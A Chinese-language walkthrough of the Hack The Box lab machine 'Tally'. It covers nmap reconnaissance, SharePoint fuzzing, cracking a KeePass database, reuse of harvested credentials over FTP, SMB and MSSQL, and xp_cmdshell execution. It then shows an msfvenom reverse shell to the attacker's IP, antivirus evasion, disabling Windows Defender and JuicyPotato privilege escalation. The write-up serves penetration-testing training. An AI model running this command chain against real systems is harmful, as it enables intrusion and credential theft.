nmap -p- -v --min-rate=10000 10.10.10.59
nmap -p 21,80,81,135,139,445,808,1433,5985,32843,32846,47001,49664,49668,49670 -sV -A -v 10.10.10.59
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 50996DA127314E31E0B14D57B9847C9F
|_http-generator: Microsoft SharePoint
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-06-21T11:23:13
| Not valid after: 2052-06-21T11:23:13
| MD5: 4f74 0b7f 7b50 1a25 7d7c 0ddc 8a54 a8cd
|_SHA-1: d780 804b c9ca 1c97 8829 7e90 fdbd 6145 c571 caf7
|_ssl-date: 2022-06-21T11:55:13+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32846/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-06-21T11:54:51
|_ start_date: 2022-06-21T11:22:57
简单尝试了一下rpc,smb,ftp都无法匿名登录
wappalyzer指纹识别为Microsoft SharePoint 15.0.0.4420 ,IIS10.0,Microsoft ASP.NET 4.0.30319 sharepoint访问发现要配上hostname——把tally配进host,界面确实发生了一些变化。 扫目录发现dirsearch不好使,它识别不了错误页面。换dirb seclist里有一个SharePoint的字典
dirb http://tally ~/Documents/SecLists-2021.3.1/Discovery/Web-Content/CMS/Sharepoint.fuzz.txt -w
挨个访问结果,有很多虽然200但是访问需要登录,找到两个有用的文件 ftp detail 下载下来内容为: FTP details hostname: tally workgroup: htb.local password: UTDRSCH53c"$6hys Please create your own user folder upon logging in
site pages里是个通知
结合以上两篇文档,成功以ftp_user:UTDRSCH53c"$6hys凭据登录ftp 然后开始翻找敏感文件,User目录下有如下用户,可能有用 Administrator Ekta Jess Paul Rahul Sarah Stuart Tim Yenwi Sarah下面有个notes.txt: done install Sharepoint, replace Orchard CMS to do uninstall SQL Server 2016
在tim的文件夹里发现有keepass,以及他的.kbdx文件,下载下来,下载之前ftp要调整到binary模式。
google搜索“kali how to read kdbx file” how-to-use-kpcli-to-manage-keepass2-password-files-on-an-ubuntu-14-04-server how-to-crack-a-keepass-database-file 使用John尝试破解
keepass2john tim.kdbx > Keepasshash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt
得到tim的密码simplementeyo
kpcli --kdb=./tim.kdbx
find .
得到两组凭据
cisco cisco123
Finance Acc0unting
尝试登录rpc和smb
smbclient -U Finance%"Acc0unting" -L //10.10.10.59
使用smbmap递归列举一下文件,方便查看
smbmap -H 10.10.10.59 -u Finance -p Acc0unting -R ACCT
发现一个敏感文件conn-info.txt smbclient连上去get下来,或者smbmap下载也行。内容为
old server details
db: sa
pass: YE%TJC%&HYbe5Nw
have changed for tally
尝试登录sqlserver果然不行 找到一个tester.exe,strings发现连接数据库的账号密码 🚩找到这个文件还是看了wp,真实考试碰到这么多文件,除了排除业务相关的文件之后一个个翻看估计也没有别的办法。
impacket-mssqlclient sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59
(指定db反而连不上) 通过xp_cmdshell获得sarah权限
在Sarah桌面找到user的flag 在另外两个文档中得到一些信息
xp_cmdshell type c:\users\Sarah\desktop\"note to tim (draft).txt"
xp_cmdshell type c:\users\Sarah\desktop\todo.txt
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.
Thanks,
Sarah
在todo.txt中,Sarah透露已经确认Windows defender处于开启状态
先生成一个payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4444 EXITFUNC=thread -f c -o tally.c
再使用遮天v2免杀,把生成的exe文件传进靶机
xp_cmdshell "cd c:\temp && certutil -urlcache -split -f http://10.10.14.12:8000/FdASC.exe"
xp_cmdshell c:\temp\FdASC.exe
然后把defender实时监测关了
powershell -c 'Set-MpPreference -DisableRealtimeMonitoring $true'
whoami /priv
发现有SeImpersonatePrivilege直接尝试烂土豆
继续用certutil把juicypotato.exe和免杀过的反弹exe(这个反弹到1234端口,免杀同上)下载进靶机。
.\jp.exe -t t -p c:\windows\system32\cmd.exe -l 2234 -a "/c c:\temp\syst.exe
获得system权限成功读取flag
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。